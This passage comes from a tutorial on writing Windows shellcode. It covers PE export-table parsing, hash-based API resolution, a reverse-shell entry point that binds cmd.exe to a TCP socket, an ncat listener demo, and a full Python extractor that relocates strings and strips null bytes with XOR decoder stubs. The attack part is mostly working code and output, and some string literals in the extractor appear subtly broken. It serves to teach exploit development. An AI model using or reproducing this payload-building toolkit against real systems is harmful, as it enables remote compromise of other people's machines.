    IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
    char *moduleName = (char *)(baseAddress + ied->Name);
    DWORD moduleHash = getHash(moduleName);

    // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
    // element of both arrays refer to the same function. The first array specifies the name whereas
    // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
    // AddressOfFunctions to find the entry point of the function.
    DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
    for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
        char *functionName = (char *)(baseAddress + nameRVAs[i]);
        if (hash == moduleHash + getHash(functionName)) {
            WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
            DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
            return baseAddress + functionRVA;
        }
    }
    .
    .
    .

Knowing the PE file format specification makes this code easier to follow; we will not go into too much detail here. The important thing to note is that many addresses in the PE file structures are RVAs (Relative Virtual Addresses), i.e. addresses relative to the base address of the PE module (DllBase). For example, if the RVA is 100h and DllBase is 400000h, then the RVA points to data at address 400000h + 100h = 400100h. The module starts with the DOS_HEADER, which contains the RVA (e_lfanew) of the NT_HEADERS. The NT_HEADERS contain the FILE_HEADER and the OPTIONAL_HEADER. The OPTIONAL_HEADER contains an array called DataDirectory, whose entries point to the various directories of the PE module. We are interested in the Export Directory; see https://msdn.microsoft.com/en-us/library/ms809762.aspx for the details.
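The header walk described above (DOS_HEADER, e_lfanew, NT_HEADERS, DataDirectory) can be tried on a byte buffer with Python 3 and struct. The sketch below assumes a 32-bit (PE32) image, where the first DataDirectory entry starts 96 bytes into the OPTIONAL_HEADER; the function name export_directory_rva and the synthetic test image are made up for this example.

```python
import struct

# Signature (4) + IMAGE_FILE_HEADER (20) + offset of DataDirectory in a PE32 optional header (96)
EXPORT_ENTRY_OFFSET = 4 + 20 + 96


def export_directory_rva(image: bytes) -> int:
    """Follow e_lfanew to the NT headers and read DataDirectory[EXPORT].VirtualAddress."""
    if image[:2] != b"MZ":
        raise ValueError("missing DOS header signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)      # offset of the NT headers
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing NT headers signature")
    (rva,) = struct.unpack_from("<I", image, e_lfanew + EXPORT_ENTRY_OFFSET)
    return rva


# Build a minimal synthetic image: only the fields read above are filled in.
image = bytearray(0x200)
image[0:2] = b"MZ"
struct.pack_into("<I", image, 0x3C, 0x80)                     # e_lfanew = 80h
image[0x80:0x84] = b"PE\0\0"
struct.pack_into("<I", image, 0x80 + EXPORT_ENTRY_OFFSET, 0x1234)

print(hex(export_directory_rva(bytes(image))))  # 0x1234
```

On a real module the returned RVA would still have to be added to the base address, exactly as the C++ code does with baseAddress + iedRVA.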

The C structure associated with the Export Directory is defined as follows:

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    DWORD   AddressOfFunctions;     // RVA from base of image
    DWORD   AddressOfNames;         // RVA from base of image
    DWORD   AddressOfNameOrdinals;  // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
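The relationship between the three arrays (AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions) is easier to see with plain lists. The Python 3 sketch below models them with made-up sample data; find_export and the sample names and RVAs are purely illustrative.

```python
def find_export(names, name_ordinals, functions, wanted):
    """Look up a function RVA the way the export directory is meant to be walked.

    names and name_ordinals run in parallel; the ordinal found at the same
    position as the name is then used as an index into functions.
    """
    for i, name in enumerate(names):
        if name == wanted:
            ordinal = name_ordinals[i]
            return functions[ordinal]
    return None


# Hypothetical export data for a module with three named exports.
names = ["Alpha", "Beta", "Gamma"]          # models AddressOfNames
name_ordinals = [2, 0, 1]                   # models AddressOfNameOrdinals
functions = [0x1000, 0x2000, 0x3000]        # models AddressOfFunctions (RVAs)

print(hex(find_export(names, name_ordinals, functions, "Beta")))   # 0x1000
print(find_export(names, name_ordinals, functions, "Missing"))     # None
```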

DefineFuncPtr

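DefineFuncPtr is a handy macro that defines a pointer to an imported function. Here is an example:

#define HASH_WSAStartup           0x2ddcd540

#define DefineFuncPtr(name)       decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)

DefineFuncPtr(WSAStartup);

WSAStartup is a function imported from ws2_32.dll, so HASH_WSAStartup is computed this way:

DWORD hash = getFunctionHash("ws2_32.dll", "WSAStartup");

When the macro is expanded,

DefineFuncPtr(WSAStartup);

becomes

decltype(WSAStartup) *My_WSAStartup = (decltype(WSAStartup) *)getProcAddrByHash(HASH_WSAStartup)

where decltype(WSAStartup) is the type of the function WSAStartup. This way we do not need to redeclare the function prototype. Note that decltype was introduced in C++11.

Now we can call WSAStartup through My_WSAStartup.

Note: before importing a function from a module, we need to make sure that the module is already loaded in memory.

The easiest way is to load the module with LoadLibrary:

DefineFuncPtr(LoadLibraryA);

My_LoadLibraryA("ws2_32.dll");

This works because LoadLibrary is imported from kernel32.dll, which is always present in memory.

We could also import GetProcAddress and use it to get the addresses of all the other functions we need, but that would be wasteful because we would have to include the full function names in the shellcode.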

entryPoint

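entryPoint is, obviously, the entry point of the shellcode and implements the reverse shell. First we import all the functions we need, then we use them. The details are not important, and I have to say that the winsock API is very cumbersome to use.

In a nutshell:

1. create a socket,
2. connect the socket to 127.0.0.1:123,
3. create a process that executes cmd.exe,
4. attach the socket to the standard input, standard output and standard error of the process,
5. wait for the process to terminate,
6. when the process has terminated, terminate the current thread.

Points 3 and 4 are performed at the same time by the call to CreateProcess. Thanks to point 4, an attacker listening on port 123 can, once the connection is established, interact with the cmd.exe running on the remote machine through the socket, i.e. the TCP connection.

To try it out, install ncat, run cmd and enter the following at the prompt:

ncat -lvp 123

This starts listening on port 123.

Then go back to Visual Studio 2013, select Release, build the project and run it. Back in ncat, you should see something like this:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm>ncat -lvp 123
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Listening on :::123
Ncat: Listening on 0.0.0.0:123
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:4409.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm\documents\visual studio 2013\Projects\shellcode\shellcode>

Now you can type any command you like. To exit, type exit.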

main

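Thanks to the linker option

Function Order: function_order.txt

where the first and only line of function_order.txt is ?entryPoint@@YAHXZ, the function entryPoint is placed first in the shellcode.

The linker appears to keep functions in source-code order, so we could also have placed entryPoint before any other function in the source. The main function comes last in the source code, so it is linked at the end of the shellcode, which is what lets us tell where the shellcode ends. We will see how when we discuss the map file.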

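0x02 Python Script

Introduction

Now that the executable containing the shellcode is ready, we need a way to extract and fix the shellcode. This is not easy, so I wrote a Python script that:

1. extracts the shellcode

2. handles the relocations for the strings

3. fixes the shellcode by removing null bytes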
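One building block of the null-byte removal in step 3 is encoding a 32-bit constant as two null-free values whose XOR gives the original. The Python 3 sketch below restates that idea in isolation, under the assumption that picking the first byte value absent from the constant is good enough; it is an illustration, not the complete fixing procedure.

```python
def dword_to_bytes(value: int):
    """Little-endian byte list of a 32-bit value."""
    return [(value >> shift) & 0xFF for shift in (0, 8, 16, 24)]


def get_xor_values(value: int):
    """Find byte lists x and y, free of null bytes, such that x[i] ^ y[i] rebuilds value."""
    data = dword_to_bytes(value)
    # A non-null byte that does not occur in the value: XORing with it never yields 0.
    missing = next(b for b in range(1, 256) if b not in data)
    xor1 = [b ^ missing for b in data]
    xor2 = [missing] * 4
    return xor1, xor2


x, y = get_xor_values(0x0000012C)           # a length such as 300 contains two null bytes
rebuilt = [a ^ b for a, b in zip(x, y)]
print(all(b != 0 for b in x + y))           # True
print(rebuilt == dword_to_bytes(0x0000012C))  # True
```

A decoder can then load the first value into a register and XOR it with the second, so the constant never appears in the shellcode with its null bytes.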

I use PyCharm to work on the script.

The script is only 392 lines long, but it is a bit tricky, so I will explain it. Here is the code:

# Shellcode extractor by Massimiliano Tomassoli (2015)

import sys
import os
import datetime
import pefile

author = 'Massimiliano Tomassoli'
year = datetime.date.today().year


def dword_to_bytes(value):
    return [value & 0xff, (value >> 8) & 0xff, (value >> 16) & 0xff, (value >> 24) & 0xff]


def bytes_to_dword(bytes):
    return (bytes[0] & 0xff) | ((bytes[1] & 0xff) << 8) | \
           ((bytes[2] & 0xff) << 16) | ((bytes[3] & 0xff) << 24)


def get_cstring(data, offset):
    '''
    Extracts a C string (i.e. null-terminated string) from data starting from offset.
    '''
    pos = data.find('\0', offset)
    if pos == -1:
        return None
    return data[offset:pos+1]


def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]

            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e.message)
        return None

    return shellcode_len


def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)

        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')

        # Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries[:-1]:         # the last element's rvs is the base_rva (why?)
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str

        return (shellcode, relocs, addr_to_strings)

    except WindowsError:
        print('[!] get_shellcode: Cannot open "%s"' % exe_file)
        return None
    except Exception as e:
        print('[!] get_shellcode: %s' % e.message)
        return None


def dword_to_string(dword):
    return ''.join([chr(x) for x in dword_to_bytes(dword)])


def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations

    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>         (contains offsets to strX (offset are from "here" label))
    #   relocs:
    #       off1|off2|...       (offsets to relocations (offset are from "here" label))
    #       str1|str2|...

    delta = 21                                      # shellcode_start - here

    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]

    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)

    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])

    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)


def dump_shellcode(shellcode):
    '''
    Prints shellcode in C format ('\x12\x23...')
    '''
    shellcode_len = len(shellcode)
    sc_array = []
    bytes_per_row = 16
    for i in range(shellcode_len):
        pos = i % bytes_per_row
        str = ''
        if pos == 0:
            str += '"'
        str += '\\x%02x' % ord(shellcode[i])
        if i == shellcode_len - 1:
            str += '";\n'
        elif pos == bytes_per_row - 1:
            str += '"\n'
        sc_array.append(str)
    shellcode_str = ''.join(sc_array)
    print(shellcode_str)


def get_xor_values(value):
    '''
    Finds x and y such that:
    1) x xor y == value
    2) x and y doesn't contain null bytes
    Returns x and y as arrays of bytes starting from the lowest significant byte.
    '''

    # Finds a non-null missing bytes.
    bytes = dword_to_bytes(value)
    missing_byte = [b for b in range(1, 256) if b not in bytes][0]

    xor1 = [b ^ missing_byte for b in bytes]
    xor2 = [missing_byte] * 4
    return (xor1, xor2)


def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''

    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]

    (xor1, xor2) = get_xor_values(len(shellcode))

    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, <missing byte>
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]

    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))


def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
'''       # The format of bytes_blocks is     #   [missing_byte1, number_of_blocks1,     #    missing_byte2, number_of_blocks2, ...]     # where missing_byteX is the value used to overwrite the null bytes in the     # shellcode, while number_of_blocksX is the number of 254-byte blocks where     # to use the corresponding missing_byteX.     bytes_blocks = []     shellcode_len = len(shellcode)     i = 0     while i < shellcode_len:         num_blocks = 0         missing_bytes = list(range(1, 256))           # Tries to find as many 254-byte contiguous blocks as possible which misses at         # least one non-null value. Note that a single 254-byte block always misses at         # least one non-null value.         while True:             if i >= shellcode_len or num_blocks == 255:                 bytes_blocks += [missing_bytes[0], num_blocks]                 break             bytes = set([ord(c) for c in shellcode[i:i+254]])             new_missing_bytes = [b for b in missing_bytes if b not in bytes]             if len(new_missing_bytes) != 0:         # new block added                 missing_bytes = new_missing_bytes                 num_blocks += 1                 i += 254             else:                 bytes += [missing_bytes[0], num_blocks]                 break       if len(bytes_blocks) > 0x7f - 5:         # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".         return None       (xor1, xor2) = get_xor_values(len(shellcode))       code = ([         0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes                                                             # bytes:         bytes_blocks + [                                    #   ...                                                             
# skip_bytes:         0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4                                                             # here:         0xC0,                                               #   (FF)C0 = INC EAX         0x5F,                                               #   POP EDI         0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>         0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>         0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]         0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here                                                             # loop1:         0xB0, 0xFE,                                         #   MOV AL, 0FEh         0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]         0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX         0x33, 0xF6,                                         #   XOR ESI, ESI         0xFC,                                               #   CLD                                                             # loop2:         0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]         0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]         0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI         0xAA,                                               #   STOSB         0x49,                                               #   DEC ECX         0x74, 0x07,                                         #   JE shellcode_begin         0x4A,                                               #   DEC EDX         0x75, 0xF2,                                         #   JNE loop2         0x43,                                               #   INC EBX         0x43,                                               #   
INC EBX         0xEB, 0xE3                                          #   JMP loop1                                                             # shellcode_begin:     ])       new_shellcode_pieces = []     pos = 0     for i in range(len(bytes_blocks) / 2):         missing_char = chr(bytes_blocks[i*2])         num_bytes = 254 * bytes_blocks[i*2 + 1]         new_shellcode_pieces.append(shellcode[pos:pos+num_bytes].replace('/0', missing_char))         pos += num_bytes       return ''.join([chr(x) for x in code]) + ''.join(new_shellcode_pieces)     def main():     print("Shellcode Extractor by %s (%d)/n" % (author, year))       if len(sys.argv) != 3:         print('Usage:/n' +               '  %s <exe file> <map file>/n' % os.path.basename(sys.argv[0]))         return       exe_file = sys.argv[1]     map_file = sys.argv[2]       print('Extracting shellcode length from "%s"...' % os.path.basename(map_file))     shellcode_len = get_shellcode_len(map_file)     if shellcode_len is None:         return     print('shellcode length: %d' % shellcode_len)       print('Extracting shellcode from "%s" and analyzing relocations...' % os.path.basename(exe_file))     result = get_shellcode_and_relocs(exe_file, shellcode_len)     if result is None:         return     (shellcode, relocs, addr_to_strings) = result       if len(relocs) != 0:         print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))         print('Strings:')         for s in addr_to_strings.values():             print('  ' + s[:-1])         print('')         shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)     else:         print('No relocations found')       if shellcode.find('/0') == -1:         print('Unbelievable: the shellcode does not need to be fixed!')         fixed_shellcode = shellcode     else:         # shellcode contains null bytes and needs to be fixed.         
print('Fixing the shellcode...')         fixed_shellcode = get_fixed_shellcode_single_block(shellcode)         if fixed_shellcode is None:             # if shellcode wasn't fixed...             fixed_shellcode = get_fixed_shellcode(shellcode)             if fixed_shellcode is None:                 print('[!] Cannot fix the shellcode')       print('final shellcode length: %d/n' % len(fixed_shellcode))     print('char shellcode[] = ')     dump_shellcode(fixed_shellcode)     main() 

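Map file and shellcode length

We told the linker to produce a map file with the following options:

  • Debugging:
    • Generate Map File: Yes (/MAP)
      Tells the linker to generate a map file describing the structure of the EXE.
    • Map File Name: mapfile

The map file is mainly needed to determine the shellcode length.

Here's the relevant part of the map file: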

 shellcode

 Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)

 Preferred load address is 00400000

 Start         Length     Name                   Class
 0001:00000000 00000a9cH .text$mn                CODE
 0002:00000000 00000094H .idata$5                DATA
 0002:00000094 00000004H .CRT$XCA                DATA
 0002:00000098 00000004H .CRT$XCAA               DATA
 0002:0000009c 00000004H .CRT$XCZ                DATA
 0002:000000a0 00000004H .CRT$XIA                DATA
 0002:000000a4 00000004H .CRT$XIAA               DATA
 0002:000000a8 00000004H .CRT$XIC                DATA
 0002:000000ac 00000004H .CRT$XIY                DATA
 0002:000000b0 00000004H .CRT$XIZ                DATA
 0002:000000c0 000000a8H .rdata                  DATA
 0002:00000168 00000084H .rdata$debug            DATA
 0002:000001f0 00000004H .rdata$sxdata           DATA
 0002:000001f4 00000004H .rtc$IAA                DATA
 0002:000001f8 00000004H .rtc$IZZ                DATA
 0002:000001fc 00000004H .rtc$TAA                DATA
 0002:00000200 00000004H .rtc$TZZ                DATA
 0002:00000208 0000005cH .xdata$x                DATA
 0002:00000264 00000000H .edata                  DATA
 0002:00000264 00000028H .idata$2                DATA
 0002:0000028c 00000014H .idata$3                DATA
 0002:000002a0 00000094H .idata$4                DATA
 0002:00000334 0000027eH .idata$6                DATA
 0003:00000000 00000020H .data                   DATA
 0003:00000020 00000364H .bss                    DATA
 0004:00000000 00000058H .rsrc$01                DATA
 0004:00000060 00000180H .rsrc$02                DATA

  Address         Publics by Value              Rva+Base       Lib:Object

 0000:00000000       ___guard_fids_table        00000000     <absolute>
 0000:00000000       ___guard_fids_count        00000000     <absolute>
 0000:00000000       ___guard_flags             00000000     <absolute>
 0000:00000001       ___safe_se_handler_count   00000001     <absolute>
 0000:00000000       ___ImageBase               00400000     <linker-defined>
 0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj
 0001:000001a1       ?getHash@@YAKPBD@Z         004011a1 f   shellcode.obj
 0001:000001be       ?getProcAddrByHash@@YAPAXK@Z 004011be f   shellcode.obj
 0001:00000266       _main                      00401266 f   shellcode.obj
 0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj
 0001:000004de       ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f   MSVCRT:unhandld.obj
 0001:0000051f       ___CxxSetUnhandledExceptionFilter 0040151f f   MSVCRT:unhandld.obj
 0001:0000052e       __XcptFilter               0040152e f   MSVCRT:MSVCR120.dll
<snip>

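The start of the map file tells us that section 1 is the .text section, which contains the code:

 Start         Length     Name                   Class
 0001:00000000 00000a9cH .text$mn                CODE

The second part tells us that the .text section starts with ?entryPoint@@YAHXZ, our entryPoint function, and that main (here called _main) is the last of our functions. Since main is at offset 0x266 and entryPoint is at offset 0, our shellcode starts at the beginning of the .text section and is 0x266 bytes long.

Here's how we do it in Python: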

def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]

            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e.message)
        return None

    return shellcode_len

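Extracting the shellcode

This part is very easy. We know the shellcode length and we know that the shellcode is located at the beginning of the .text section. Here's the code: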

def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                <snip>

        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')
<snip>

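I use the module pefile (download). The relevant part is the body of the if statement.

Strings and .rdata

As we said before, our C/C++ code may contain strings. For instance, our shellcode contains the following line:

My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

The string cmd.exe is located in the .rdata section, a read-only section containing initialized data. The code refers to that string using an absolute address: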

00241152 50                   push        eax
00241153 8D 44 24 5C          lea         eax,[esp+5Ch]
00241157 C7 84 24 88 00 00 00 00 01 00 00 mov         dword ptr [esp+88h],100h
00241162 50                   push        eax
00241163 52                   push        edx
00241164 52                   push        edx
00241165 52                   push        edx
00241166 6A 01                push        1
00241168 52                   push        edx
00241169 52                   push        edx
0024116A 68 18 21 24 00       push        242118h         <------------------------
0024116F 52                   push        edx
00241170 89 B4 24 C0 00 00 00 mov         dword ptr [esp+0C0h],esi
00241177 89 B4 24 BC 00 00 00 mov         dword ptr [esp+0BCh],esi
0024117E 89 B4 24 B8 00 00 00 mov         dword ptr [esp+0B8h],esi
00241185 FF 54 24 34          call        dword ptr [esp+34h]

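As we can see, the absolute address of cmd.exe is 242118h. Note that the address is part of a push instruction and is located at 24116Bh. If we examine our executable file with a file editor, we see the following:

56A: 68 18 21 40 00           push        000402118h

where 56Ah is the offset in the file. The corresponding virtual address (i.e. in memory) is 40116Ah because the image base is 400000h, which is the preferred address at which the executable should be loaded in memory. The absolute address in the instruction, 402118h, is correct if the executable is loaded at the preferred base address. However, if the executable is loaded at a different base address, the instruction needs to be fixed. (In the disassembly above the image was loaded at 240000h, which is why the operand reads 242118h.) How can the Windows loader know which locations of the executable contain addresses that need to be fixed? The PE file contains a Relocation Directory, which in our case points to the .reloc section. This directory contains the RVAs of all the locations that need to be fixed.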
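As a rough illustration of what the Windows loader does with one such entry, here is a minimal Python 3 sketch that applies a single 32-bit fix-up to a tiny fake image. The helper name apply_relocation and the fake image are assumptions made for this example only, and the base address 240000h is inferred from the runtime addresses in the disassembly above.

```python
import struct

PREFERRED_BASE = 0x400000   # preferred load address from the map file
ACTUAL_BASE = 0x240000      # inferred: 24116Ah at runtime vs 40116Ah preferred

def apply_relocation(image, rva, preferred_base, actual_base):
    """Adds (actual_base - preferred_base) to the DWORD stored at rva."""
    delta = actual_base - preferred_base
    (value,) = struct.unpack_from('<I', image, rva)
    struct.pack_into('<I', image, rva, (value + delta) & 0xFFFFFFFF)

# Fake image: only the PUSH instruction at RVA 116Ah matters here.
image = bytearray(0x2000)
image[0x116A:0x116F] = bytes([0x68, 0x18, 0x21, 0x40, 0x00])   # push 402118h

# The Relocation Directory lists RVA 116Bh (the operand of the PUSH).
apply_relocation(image, 0x116B, PREFERRED_BASE, ACTUAL_BASE)
print(image[0x116A:0x116F].hex())   # 6818212400, i.e. push 242118h
```

The result matches the bytes 68 18 21 24 00 seen in the debugger listing.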

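We can inspect this directory and look for addresses of locations that

1. are contained in the shellcode (i.e. lie between .text:0 and the main function, excluded),
2. contain pointers to data in .rdata.

For example, the Relocation Directory will contain, among many other addresses, the address 40116Bh, which locates the last four bytes of the instruction push 402118h. These bytes form the address 402118h, which points to the string cmd.exe contained in .rdata (which starts at address 402000h).

Let's look at the function get_shellcode_and_relocs. In the first part we extract the .rdata section: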

def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                <snip>
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)

        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')

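The relevant part is the body of the elif.

In the second part of the same function, we analyze the relocations, find the locations that lie within our shellcode, and extract from .rdata the null-terminated strings referenced by those locations.

As we already said, we're only interested in locations contained in our shellcode. Here's the relevant part of the function get_shellcode_and_relocs: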

        # Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries[:-1]:         # the last element's rva is the base_rva (why?)
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
